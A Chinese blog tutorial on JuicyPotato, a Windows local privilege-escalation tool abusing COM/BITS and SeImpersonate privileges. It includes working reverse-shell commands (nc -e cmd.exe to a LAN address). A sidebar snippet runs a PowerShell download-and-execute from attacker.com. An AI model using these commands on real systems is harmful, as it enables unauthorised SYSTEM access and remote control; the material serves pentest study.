JuicyPotato提权

最新推荐文章于 2024-05-12 09:46:15 发布
最新推荐文章于 2024-05-12 09:46:15 发布
阅读量3.6k 收藏
点赞数
分类专栏: 渗透技巧 文章标签: 服务器 windows 提权 安全漏洞 juicypotato
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/b10d9/article/details/122721702
版权

需要了解的几个知识点

  1. BITS服务是什么

BITS是一个与网络传输相关的系统服务。可用于上传下载文件到HTTP或SMB服务器,Windows更新也用到了BITS,BITS可以实现网络重连或系统重启后,续传文件。

BITS是与.NET/C/C++开发相关的COM接口。BITS是一种COM服务。

BITS会监听本地6666端口。

  1. RottenPotatoNG是什么

基于BITS服务进行提权工具。

当具备SeImpersonate和SeAssignPrimaryToken权限时,禁用BITS服务,并占用6666端口,实现权限提升。

  1. CLSID,即ClassID,是全局唯一标识,用于标识COM服务。JuicyPotato利用的就是COM服务进行提权。
  2. 可用于提权的COM服务有:Wuauserv(Windows update)、Wsearch(Windows search)、XblGameSave(Xbox live save game)、BITS

漏洞利用的点是什么

基于RottenPotatoNG的提权原理,利用其他类似COM服务,实现提权。

个人理解:类似中间人攻击,冒名顶替COM服务,以高权限执行脚本或程序,实现提权。

juicypotato提权过程

juicypotato关键内容如下:

CLSID:靶机上可利用的CLSID,不同操作系统CLSID可能会不同。对应“-c”参数。

COM监听端口:自定义可用端口,和回连shell的端口无关,不一定要设置成一样的。对应“-l”参数。

用户权限:CreateProcessWithToken(需要SeImpersonate)和CreateProcessAsUser(需要SeAssignPrimaryToken),不同的用户权限可调用的程序会有所不同,同时具备就能获取system权限。对应“-t”参数。

期望运行的程序或脚本:指定需要靶机执行动作对应的程序或脚本,如cmd或回连的powershell脚本。对应“-p”参数。

程序或脚本对应的参数:指定所需参数,如ps脚本需要传入的IP或端口,如不需要则无需该项参数。对应“-a”参数。

提权成功关键点:

  • 有可利用的COM服务,找到对应的CLSID。

  • 具备SeImpersonate和SeAssignPrimaryToken权限。

  • 能够将文件上传到靶机。

示例:

# 利用juicypotato打开cmd,执行nc回连。 
.\juicypotato.exe -l 6767 -p "c:\windows\system32\cmd.exe" -a "/c C:\nc.exe -e cmd.exe 192.168.1.7 6767" -t * -c "{854A20FB-2D44-457D-992F-EF13785D2B51}" 

# 将回连写入bat文件,利用juicypotato执行bat文件。 
# 不指定CLSID时,默认使用{4991d34b-80a1-4291-83b6-3328366b9097} 
.\juicypotato.exe -l 8928 -p "priv.bat" -t * 

# priv.bat文件内容 
c:\nc.exe -e c:\Windows\System32\cmd.exe 192.168.1.7 6767

当默认CLSID不可用时,需要手动测试出可用的CLSID。

方式一:作者已经针对不同的操作系统整理了CLSID,可以参考。

方式二:上传GetCLSID.ps1和test_CLSID.bat到靶机,测试可用的CLSID。

powershell -executionpolicy bypass -file GetCLSID.ps1 
# 执行脚本,收集所有的CLSID。 
# 脚本输出放在由脚本生成的系统版本为名称的文件夹里。
 
.\test_CLSID.bat # 执行脚本,检测可用的CLSID。 
# 脚本需要调整内容:1)CLSID.list文件位置。2)juicypotato.exe文件位置。

参考连接

Impersonating Privileges with Juicy Potato | by Nairuz Abulhul | R3d Buck3T | Medium

Windows CLSID | juicy-potato (ohpe.it)

Juicy Potato (abusing the golden privileges) | juicy-potato (ohpe.it)

Windows Privilege Escalation: Abusing SeImpersonatePrivilege with Juicy Potato | Infinite Logins

JuicyPotato - HackTricks

包大人在此
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
juicy-potato:RottenPotatoNG的加糖版本,带有一点汁,即从Windows服务帐户到NT AUTHORITY \ SYSTEM的另一个本地特权升级工具
02-06
juicy-potato:RottenPotatoNG的加糖版本,带有一点汁,即从Windows服务帐户到NT AUTHORITY \ SYSTEM的另一个本地特权升级工具
多汁土豆(JuicyPotato)的提权使用
zhanqinli的博客
04-21 894
4、接着打开结果日志result.log文件,可以看到有部分的clisd是system权限,选择其中一个,在命令行中输入>JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {000C101C-0000-0000-C000-0000000000461}链接:https://pan.baidu.com/s/1Ev-0THVltaSMDipFvBcrFg。2、在命令行窗口使用whoami /priv查看权限,如果全都禁用则无法提权
深挖金薯:Juicy Potato —— Windows权限提升新利器
最新发布
gitblog_00100的博客
05-12 313
深挖金薯:Juicy Potato —— Windows权限提升新利器 项目地址:https://gitcode.com/ohpe/juicy-potato 项目介绍 在网络安全领域,本地权限升级是攻击者常用来扩大控制范围的手段。Juicy Potato 是一款基于 RottenPotatoNG 的增强版工具,专为那些寻求从服务账户到 NT AUTHORITY\SYSTEM 权限提升的安全研究人员...
烂土豆(JuicyPotato)提权
热门推荐
Shanfenglan's blog
11-18 9万+
CATALOG1.前言2.原理2.1前置知识2.2juicypotato实现流程3.实现3.1提权结果3.2实现步骤3.2.1先使用powershell脚本找到可用的CLSID3.2.2再使用bat文件确定能利用的CLSID3.2.3使用juicypotato进行利用4.防御方法5.参考文章 1.前言 很有名的一个提权工具,今天对其做一个小小的使用总结。 2.原理 2.1前置知识 首先我们要知道: 使用DCOM的时候,如果以服务方式远程连接,那么为system权限,例如BITS服务。 使用DCOM可以通过
烂土豆Juicypotato提权原理和利用
god_Zeo的安全博客
05-25 1万+
0x00 Potato(烂土豆)提权原理: 所谓的烂土豆提权就是俗称的MS16-075 可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别。 一、简单的原理: 攻击者可以诱骗用户尝试使用NTLM对他的计算机进行身份验证,则他可以将该身份验证尝试中继到另一台计算机! Microsoft通过使用已经进行的质询来禁止同协议NTLM身份验证来对此进行修补。这意味着从一个主机回到自身的SMB-> SMB NTLM中继
提权小神器-JuicyPotato多种应用场景详解
J0o1ey Blog
03-25 7439
0X00-Juicy-Potato简介 Juicy Potato江湖人称烂土豆,是在MS16-075漏洞利用工具RottenPotatoN工具的基础上做了扩展(A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows S...
烂土豆提权神器(改进版)
04-15
具体的使用方法请查看本人的文章:服务器提权常见方法介绍。 本着免费分享的原则,下载时不需要扣除用户的积分,可放心和使用。同时由于本工具涉及的敏感操作,杀毒软件一定会报毒,可添加信任,如果不放心,请在...
烂土豆家族(Rotten Potato、Juicy Potato、Pipe Potato
11-17
Pipe Potato则是一种利用Windows管道通信机制的提权工具。它通过创建和利用命名管道,可以绕过权限限制,实现权限升级。攻击者可以利用这个工具在低权限账户下执行高权限操作,例如读取或修改受保护的系统文件。 在...
juicy_2:适用于Win10的juicypotato> 1803和Win Server 2019
03-04
juicy_2 适用于Win10的JuicyPotato> 1803和Win Server 2019 请先阅读我的博客文章: : 免责声明: 这只是对JuicyPotato的快速而肮脏的修改,以测试有效的CLSID并模拟它们(您需要假冒特权)以用于较新的Windows 10和...
Z1-AggressorScripts:适用于Cobalt Strike的插件
04-30
Z1-AggressorScripts 适用于Cobalt Strike 3.x & 4.x 的插件。 2020.12.20 更新: 更新工具。 2020.11.21 更新: 辅助模块的zip打包更换成uknow师傅的,...提权 获取可提取漏洞 juicypotato MS14-058 MS15-051 MS16-016
Rotten/Juicy Potato提权原理分析
qq_42045349的博客
06-25 1254
@TOCRotten/Juicy Potato提权原理分析 Rotten/Juicy Potato提权原理分析 当 DCOM 对象被传递到进程外 COM 服务器时,对象引用被编组在 OBJREF 流中。对于按引用编组,这会导致生成 OBJREF_STANDARD 流,该流为服务器提供足够的信息以定位原始对象并绑定到它。除了对象的标识还有一个 RPC 绑定字符串列表(包含一个 TowerId 和一个字符串)。当发生解组时,通过将塔指定为 NCACN_IP_TCP 和host[port]形式的字符串,这可以被
potato 土豆最新版本下载potato_v2.20.201001,安卓版本
01-29
potato 土豆最新版本下载potato_v2.20.201001,安卓版本
rottenpotato.exe
10-26
非常稀有的tomato.exe提取exp,iis7.5可以使用。ctf比赛使用。
Juicy Potato本地特权提升工具(RottenPotatoNG加强版)
systemino的博客
04-22 1325
RottenPotatoNG及其变体利用了基于在127.0.0.1:6666上具有MiTM侦听器的BITS服务,以及当你拥有SeImpersonate或SeAssignPrimaryToken权限时的特权提升链。 概要 Juicy Potato是一个本地特权提升工具,是RottenPotatoNG的加强版。RottenPotatoNG及其变体利用了基于在127.0.0.1:6666上具有MiT...
windows提权—烂土豆(RottenPotato)及Juicy Potato提权
negnegil的博客
09-11 1万+
介绍 烂土豆(Rotten Potato) MS16-075 提权是一个本地提权,只针对本地用户,不支持域用户 适用版本:Windows 7、8、10、2008、2012 烂土豆下载地址: https://github.com/foxglovesec/Potato 烂土豆提权原理: 欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通
Potato提权(原理简述)
qq_18811919的博客
12-29 1427
在红蓝对抗过程中Web打点之后往往需要进行提权才能进行横向操作,本篇文章将简单讲述土豆提权原理
windows c++ 服务 当前用户提权_提权小神器JuicyPotato多种应用场景详解
weixin_39928818的博客
12-04 370
0X00-Juicy-Potato简介Juicy Potato江湖人称烂土豆,是在MS16-075漏洞利用工具RottenPotatoN工具的基础上做了扩展(带有糖的RottenPotatoNG,带有一点汁液,即Windows服务帐户中的**另一种本地特权升级工具)到NT AUTHORITY \ SYSTEM ***)追根到底是一种Windows的本地提权工具,利用了COM对象进行提权 ...
Potato提权小结
wo41ge的博客
11-11 1万+
前言 当我们拿到webshell 却苦于无法提权 早之前有巴西烤肉提权,有pr提权 今天 来一个土豆提权合集 妈妈再也不担心我的webshell无法提权了 Hot Potato 前言 利用 Windows 中的已知问题在默认配置中获得本地权限提升 即 NTLM 中继(特别是 HTTP->SMB 中继)和 NBNS 欺骗 攻击者可以在安装了Windows操作系统的工作站中将自己的低权限提升至NT AUTHORITY\SYSTEM 影响范围 Windows 7、8、10、Server 2008 和 Ser
JuicyPotato怎么安装
05-12
JuicyPotato是一个Windows权限升级工具,可以帮助攻击者在Windows计算机上取得本地管理员权限。以下是安装步骤: 1. 首先,你需要下载JuicyPotato的最新版本。可以从GitHub上的官方存储库中下载。 2. 解压缩下载的zip文件,并将其中的JuicyPotato.exe文件复制到你的攻击者机器上。 3. 打开命令提示符或PowerShell,并切换到JuicyPotato.exe所在的目录。 4. 运行以下命令: `JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c 'IEX (New-Object Net.WebClient).DownloadString(\"http://attacker.com/shell.ps1\");'"` 这个命令将JuicyPotato绑定到本地端口1337上,并将cmd.exe作为目标进程。然后,它将使用PowerShell下载并执行一个远程脚本,该脚本将在攻击者机器上打开一个反向Shell。 5. 等待目标用户启动cmd.exe,然后你就可以通过反向Shell与目标机器进行交互了。 请注意,JuicyPotato的使用可能会涉及到未经授权的系统访问,违反法律法规和伦理道德。在进行任何操作之前,请确保你已经获得了所有必要的授权和许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值